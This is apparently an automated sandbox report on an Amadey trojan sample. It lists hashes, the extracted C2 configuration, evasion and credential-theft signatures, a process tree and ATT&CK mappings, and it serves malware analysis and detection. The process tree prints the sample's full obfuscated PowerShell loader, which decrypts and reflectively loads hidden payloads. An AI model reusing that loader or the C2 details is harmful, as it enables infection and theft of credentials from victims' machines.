amadey | eac6415514e57d0fd71154226cf6d5934a93424d8a93e8d0f407d5b2e4533f70

Analysis

max time kernel
150s
max time network
151s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
03/12/2024, 01:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe
Size

1.8MB
MD5

9ee9fc91594ff0d745d83ae3ede6c725
SHA1

27ca7f96db3ed74658fc89ca6d33db35c59d8a77
SHA256

5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7
SHA512

bf7d5e625fbe7adb3d1bbdc60d9263a8bb3cc000f6053033ae1ea786f7a657e5012f0f0946835b18622313e6b0f298b0e1e7aa29329f89a9f45ad440220fccef
SSDEEP

49152:lkk2FX4poT387IR/vpA82dUSZ3nVZdUuHKSMuj:qk7ow7IRpd2djlV8Amu

Score

10^/10

amadey 9c9aa5 discovery evasion spyware stealer trojan

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

http://185.215.113.43

Attributes

install_dir
abc3bc1985
install_file
skotes.exe
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
url_paths
/Zu7JuNko/index.php

rc4.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 2888 created 1232	2888	rhnew.exe	21

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rhnew.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 6 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rhnew.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rhnew.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe

Executes dropped EXE 3 IoCs

pid	Process
2580	skotes.exe
288	vvcWObH.exe
2888	rhnew.exe

Identifies Wine through registry keys 2 TTPs 3 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine	5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe
Key opened	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine	rhnew.exe

Loads dropped DLL 5 IoCs

pid	Process
2380	5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe
2380	5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe
2580	skotes.exe
2580	skotes.exe
2580	skotes.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
6	api.myip.com
7	api.myip.com

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
2380	5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe
2580	skotes.exe
2888	rhnew.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\skotes.job	5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe
File opened for modification	C:\Windows\INF\setupapi.app.log	dxdiag.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dxdiag.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rhnew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dialer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe

Modifies registry class 34 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ProgID\ = "DxDiag.DxDiagClassObject.1"	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\VersionIndependentProgID\ = "DxDiag.DxDiagClassObject"	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CurVer\ = "DxDiag.DxDiagClassObject.1"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\CLSID	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1\CLSID	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ForceRemove\ = "Programmable"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\CLSID\ = "{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CLSID	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CLSID\ = "{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CurVer	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ForceRemove	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CurVer\ = "DxDiag.DxDiagClassObject.1"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\ = "DxDiagClassObject Class"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\ProgID	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ = "DxDiagClassObject Class"	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ = "C:\\Windows\\SysWOW64\\dxdiagn.dll"	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1\ = "DxDiagProvider Class"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\InprocServer32	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\ = "DxDiagClassObject Class"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\VersionIndependentProgID	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CLSID	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\VersionIndependentProgID	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ProgID	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\ = "DxDiagProvider Class"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CurVer	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ThreadingModel = "Apartment"	dxdiag.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	skotes.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	skotes.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
2380	5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe
2580	skotes.exe
288	vvcWObH.exe
1956	dxdiag.exe
1956	dxdiag.exe
2024	powershell.exe
2888	rhnew.exe
2888	rhnew.exe
2888	rhnew.exe
2888	rhnew.exe
2888	rhnew.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

description	pid	Process
Token: SeDebugPrivilege	288	vvcWObH.exe
Token: SeIncreaseQuotaPrivilege	872	WMIC.exe
Token: SeSecurityPrivilege	872	WMIC.exe
Token: SeTakeOwnershipPrivilege	872	WMIC.exe
Token: SeLoadDriverPrivilege	872	WMIC.exe
Token: SeSystemProfilePrivilege	872	WMIC.exe
Token: SeSystemtimePrivilege	872	WMIC.exe
Token: SeProfSingleProcessPrivilege	872	WMIC.exe
Token: SeIncBasePriorityPrivilege	872	WMIC.exe
Token: SeCreatePagefilePrivilege	872	WMIC.exe
Token: SeBackupPrivilege	872	WMIC.exe
Token: SeRestorePrivilege	872	WMIC.exe
Token: SeShutdownPrivilege	872	WMIC.exe
Token: SeDebugPrivilege	872	WMIC.exe
Token: SeSystemEnvironmentPrivilege	872	WMIC.exe
Token: SeRemoteShutdownPrivilege	872	WMIC.exe
Token: SeUndockPrivilege	872	WMIC.exe
Token: SeManageVolumePrivilege	872	WMIC.exe
Token: 33	872	WMIC.exe
Token: 34	872	WMIC.exe
Token: 35	872	WMIC.exe
Token: SeIncreaseQuotaPrivilege	872	WMIC.exe
Token: SeSecurityPrivilege	872	WMIC.exe
Token: SeTakeOwnershipPrivilege	872	WMIC.exe
Token: SeLoadDriverPrivilege	872	WMIC.exe
Token: SeSystemProfilePrivilege	872	WMIC.exe
Token: SeSystemtimePrivilege	872	WMIC.exe
Token: SeProfSingleProcessPrivilege	872	WMIC.exe
Token: SeIncBasePriorityPrivilege	872	WMIC.exe
Token: SeCreatePagefilePrivilege	872	WMIC.exe
Token: SeBackupPrivilege	872	WMIC.exe
Token: SeRestorePrivilege	872	WMIC.exe
Token: SeShutdownPrivilege	872	WMIC.exe
Token: SeDebugPrivilege	872	WMIC.exe
Token: SeSystemEnvironmentPrivilege	872	WMIC.exe
Token: SeRemoteShutdownPrivilege	872	WMIC.exe
Token: SeUndockPrivilege	872	WMIC.exe
Token: SeManageVolumePrivilege	872	WMIC.exe
Token: 33	872	WMIC.exe
Token: 34	872	WMIC.exe
Token: 35	872	WMIC.exe
Token: SeRestorePrivilege	1956	dxdiag.exe
Token: SeRestorePrivilege	1956	dxdiag.exe
Token: SeRestorePrivilege	1956	dxdiag.exe
Token: SeRestorePrivilege	1956	dxdiag.exe
Token: SeRestorePrivilege	1956	dxdiag.exe
Token: SeRestorePrivilege	1956	dxdiag.exe
Token: SeRestorePrivilege	1956	dxdiag.exe
Token: SeDebugPrivilege	2024	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2380	5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1956	dxdiag.exe

Suspicious use of WriteProcessMemory 46 IoCs

description	pid	Process	procid_target
PID 2380 wrote to memory of 2580	2380	5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe	30
PID 2380 wrote to memory of 2580	2380	5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe	30
PID 2380 wrote to memory of 2580	2380	5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe	30
PID 2380 wrote to memory of 2580	2380	5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe	30
PID 2580 wrote to memory of 288	2580	skotes.exe	32
PID 2580 wrote to memory of 288	2580	skotes.exe	32
PID 2580 wrote to memory of 288	2580	skotes.exe	32
PID 2580 wrote to memory of 288	2580	skotes.exe	32
PID 288 wrote to memory of 680	288	vvcWObH.exe	33
PID 288 wrote to memory of 680	288	vvcWObH.exe	33
PID 288 wrote to memory of 680	288	vvcWObH.exe	33
PID 680 wrote to memory of 872	680	cmd.exe	35
PID 680 wrote to memory of 872	680	cmd.exe	35
PID 680 wrote to memory of 872	680	cmd.exe	35
PID 288 wrote to memory of 264	288	vvcWObH.exe	37
PID 288 wrote to memory of 264	288	vvcWObH.exe	37
PID 288 wrote to memory of 264	288	vvcWObH.exe	37
PID 264 wrote to memory of 1956	264	dxdiag.exe	38
PID 264 wrote to memory of 1956	264	dxdiag.exe	38
PID 264 wrote to memory of 1956	264	dxdiag.exe	38
PID 264 wrote to memory of 1956	264	dxdiag.exe	38
PID 288 wrote to memory of 2968	288	vvcWObH.exe	39
PID 288 wrote to memory of 2968	288	vvcWObH.exe	39
PID 288 wrote to memory of 2968	288	vvcWObH.exe	39
PID 2580 wrote to memory of 2812	2580	skotes.exe	41
PID 2580 wrote to memory of 2812	2580	skotes.exe	41
PID 2580 wrote to memory of 2812	2580	skotes.exe	41
PID 2580 wrote to memory of 2812	2580	skotes.exe	41
PID 2812 wrote to memory of 1916	2812	cmd.exe	43
PID 2812 wrote to memory of 1916	2812	cmd.exe	43
PID 2812 wrote to memory of 1916	2812	cmd.exe	43
PID 2812 wrote to memory of 1916	2812	cmd.exe	43
PID 2812 wrote to memory of 2024	2812	cmd.exe	44
PID 2812 wrote to memory of 2024	2812	cmd.exe	44
PID 2812 wrote to memory of 2024	2812	cmd.exe	44
PID 2812 wrote to memory of 2024	2812	cmd.exe	44
PID 2580 wrote to memory of 2888	2580	skotes.exe	45
PID 2580 wrote to memory of 2888	2580	skotes.exe	45
PID 2580 wrote to memory of 2888	2580	skotes.exe	45
PID 2580 wrote to memory of 2888	2580	skotes.exe	45
PID 2888 wrote to memory of 2536	2888	rhnew.exe	46
PID 2888 wrote to memory of 2536	2888	rhnew.exe	46
PID 2888 wrote to memory of 2536	2888	rhnew.exe	46
PID 2888 wrote to memory of 2536	2888	rhnew.exe	46
PID 2888 wrote to memory of 2536	2888	rhnew.exe	46
PID 2888 wrote to memory of 2536	2888	rhnew.exe	46

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1232
- C:\Users\Admin\AppData\Local\Temp\5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe
  "C:\Users\Admin\AppData\Local\Temp\5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Identifies Wine through registry keys
  - Loads dropped DLL
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:2380
- - C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
    "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Loads dropped DLL
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:2580
  - - C:\Users\Admin\AppData\Local\Temp\1011339001\vvcWObH.exe
      "C:\Users\Admin\AppData\Local\Temp\1011339001\vvcWObH.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:288
    - - C:\Windows\system32\cmd.exe
        
        "cmd" /c wmic path win32_videocontroller get caption
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:680
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_videocontroller get caption
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:872
    - - C:\Windows\system32\dxdiag.exe
        
        "dxdiag" /t C:\Users\Admin\AppData\Local\Temp\dxdiag.txt
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:264
      - C:\Windows\SysWOW64\dxdiag.exe
        
        "C:\Windows\SysWOW64\dxdiag.exe" /t C:\Users\Admin\AppData\Local\Temp\dxdiag.txt
        6⤵
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:1956
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 288 -s 1576
        5⤵
        
        PID:2968
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\1011428021\withroot.cmd" "
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2812
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\1011428021\withroot.cmd';$dDiO='LRynPoadRynP'.Replace('RynP', ''),'SpaoCflitaoCf'.Replace('aoCf', ''),'CpVXarepVXaapVXateDpVXaepVXacrpVXayppVXatpVXaorpVXa'.Replace('pVXa', ''),'ChsohbansohbgeEsohbxtsohbensohbssohbisohbosohbnsohb'.Replace('sohb', ''),'CopmwsyyTomwsy'.Replace('mwsy', ''),'RjwWteajwWtdLjwWtinjwWtesjwWt'.Replace('jwWt', ''),'FroxuoEmxuoEBasxuoEe6xuoE4StxuoErixuoEngxuoE'.Replace('xuoE', ''),'InwozUvowozUkwozUewozU'.Replace('wozU', ''),'GVJeMeVJeMtCVJeMurVJeMrVJeMentVJeMProVJeMceVJeMsVJeMsVJeM'.Replace('VJeM', ''),'ElkXvnemekXvnntkXvnAkXvntkXvn'.Replace('kXvn', ''),'EntMmVmryPMmVmoiMmVmntMmVm'.Replace('MmVm', ''),'TUudXranUudXsfUudXorUudXmFiUudXnaUudXlBlUudXocUudXkUudX'.Replace('UudX', ''),'MayhiDinMyhiDoyhiDduyhiDleyhiD'.Replace('yhiD', ''),'DejLwccojLwcmpjLwcresjLwcsjLwc'.Replace('jLwc', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($dDiO[8])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function yLwIh($TZhDQ){$YZolA=[System.Security.Cryptography.Aes]::Create();$YZolA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$YZolA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$YZolA.Key=[System.Convert]::($dDiO[6])('duQk/QtsCXjlfUWS6XCUuCu5I1g6+OrVeXJ2aigXvB8=');$YZolA.IV=[System.Convert]::($dDiO[6])('9XjdTIP29vRyU5L9wYwsyw==');$BZniG=$YZolA.($dDiO[2])();$mkKMG=$BZniG.($dDiO[11])($TZhDQ,0,$TZhDQ.Length);$BZniG.Dispose();$YZolA.Dispose();$mkKMG;}function XFQUx($TZhDQ){$WCDIU=New-Object System.IO.MemoryStream(,$TZhDQ);$NUdnb=New-Object System.IO.MemoryStream;$TtrMr=New-Object System.IO.Compression.GZipStream($WCDIU,[IO.Compression.CompressionMode]::($dDiO[13]));$TtrMr.($dDiO[4])($NUdnb);$TtrMr.Dispose();$WCDIU.Dispose();$NUdnb.Dispose();$NUdnb.ToArray();}$wHJim=[System.IO.File]::($dDiO[5])([Console]::Title);$kvBry=XFQUx (yLwIh ([Convert]::($dDiO[6])([System.Linq.Enumerable]::($dDiO[9])($wHJim, 5).Substring(2))));$hsQZC=XFQUx (yLwIh ([Convert]::($dDiO[6])([System.Linq.Enumerable]::($dDiO[9])($wHJim, 6).Substring(2))));[System.Reflection.Assembly]::($dDiO[0])([byte[]]$hsQZC).($dDiO[10]).($dDiO[7])($null,$null);[System.Reflection.Assembly]::($dDiO[0])([byte[]]$kvBry).($dDiO[10]).($dDiO[7])($null,$null); "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1916
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2024
  - - C:\Users\Admin\AppData\Local\Temp\1011445001\rhnew.exe
      "C:\Users\Admin\AppData\Local\Temp\1011445001\rhnew.exe"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:2888
- C:\Windows\SysWOW64\dialer.exe
  "C:\Windows\system32\dialer.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2536

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

